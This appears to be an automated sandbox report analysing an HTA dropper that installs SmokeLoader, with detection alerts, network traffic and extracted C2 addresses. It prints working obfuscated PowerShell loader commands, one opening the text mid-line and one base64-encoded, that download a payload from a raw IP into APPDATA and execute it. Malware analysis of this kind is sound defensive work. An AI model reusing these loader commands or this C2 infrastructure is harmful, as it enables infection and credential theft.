-ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline", ProcessId: 7772, ProcessName: csc.exe

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:09:49.834350+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49744	46.173.214.14	80	TCP
2025-01-08T11:09:54.445641+0100	2039103	1	A Network Trojan was detected	192.168.2.4	49746	46.173.214.14	80	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:08:59.528574+0100	2858795	1	A Network Trojan was detected	192.168.2.4	49733	192.3.27.144	80	TCP

ETPRO MALWARE SmokeLoader encrypted module (3)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T11:09:50.092954+0100	2829848	2	Potentially Bad Traffic	46.173.214.14	80	192.168.2.4	49744	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://prolinice.ga/index.php	Avira URL Cloud: Label: malware
Source: http://vilendar.ga/index.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Multi AV Scanner detection for submitted file

Source: begoodforeverythinggreatthingsformebetterforgood.hta

Virustotal: Detection: 10%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02793098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	17_2_02793098
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02793717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	17_2_02793717
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02793E04 RtlCompareMemory,CryptUnprotectData,	17_2_02793E04
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_0279123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	17_2_0279123B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_027911E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	17_2_027911E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02791198 CryptBinaryToStringA,CryptBinaryToStringA,	17_2_02791198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02791FCE CryptUnprotectData,RtlMoveMemory,	17_2_02791FCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02F526AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	19_2_02F526AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	20_2_02CA178C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	20_2_02CA118D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_0279263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	22_2_0279263E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_0279245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	22_2_0279245E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02792404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	22_2_02792404
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_027925A4 CryptBinaryToStringA,CryptBinaryToStringA,	27_2_027925A4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_02792799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	27_2_02792799

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: begoodforeverythinggreatthingsformebetterforgood.hta, type: SAMPLE

Source:	Binary string: $^q7C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.pdb source: powershell.exe, 00000004.00000002.1762483774.0000000004F17000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1971140719.00000000068D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetihascustomattributeczprocess_informationcxcydnlib.dotnet.mdrawassemblyrefrowhmdnlib.dotnet.writermethodbodychunkshlmicrosoft.win32.taskschedulernetworksettingshohnhihhhkhjhehdhghfhamicrosoft.win32.taskschedulertaskschedulersnapshothchbcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvt
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: icgfugf, 0000000F.00000000.2187284917.0000000000732000.00000002.00000001.01000000.0000000F.sdmp, icgfugf.14.dr
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1971140719.00000000068D0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1973004774.000000000707B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02792B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	17_2_02792B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02793ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	17_2_02793ED9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02791D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	17_2_02791D4A
Source: C:\Windows\explorer.exe	Code function: 18_2_001930A8 FindFirstFileW,FindNextFileW,FindClose,	18_2_001930A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_02F5255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,	19_2_02F5255C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA14D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,	20_2_02CA14D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA13FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,	20_2_02CA13FE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_02CA15BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,	20_2_02CA15BE
Source: C:\Windows\explorer.exe	Code function: 21_2_005D1EB4 FindFirstFileW,FindNextFileW,FindClose,	21_2_005D1EB4
Source: C:\Windows\explorer.exe	Code function: 21_2_005D1DB0 FindFirstFileW,FindNextFileW,FindClose,	21_2_005D1DB0

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49733 -> 192.3.27.144:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 46.173.214.14:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 46.173.214.14:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 46.173.214.14 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://prolinice.ga/index.php
Source: Malware configuration extractor	URLs: http://vilendar.ga/index.php

Yara detected Generic Downloader

Source: Yara match

File source: 8.2.powershell.exe.643a1f0.0.raw.unpack, type: UNPACKEDPE

Source: global traffic

HTTP traffic detected: GET /250/evenmegoodfor.txt HTTP/1.1Host: 192.3.27.144Connection: Keep-Alive

Source: Joe Sandbox View	ASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Network traffic

Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 46.173.214.14:80 -> 192.168.2.4:49744

Source: global traffic	HTTP traffic detected: GET /250/sweetnessgoodforgreatnessthingswithgood.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.27.144Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://prfkokybvrvkyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: prolinice.ga
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: prolinice.ga

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.27.144

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_04987A18 URLDownloadToFileW,

4_2_04987A18

Source: global traffic	HTTP traffic detected: GET /250/sweetnessgoodforgreatnessthingswithgood.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.27.144Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /250/evenmegoodfor.txt HTTP/1.1Host: 192.3.27.144Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic	DNS traffic detected: DNS query: prolinice.ga

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prfkokybvrvkyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: prolinice.ga

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 10:09:49 GMTServer: Apache/2.4.59 (Debian)Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 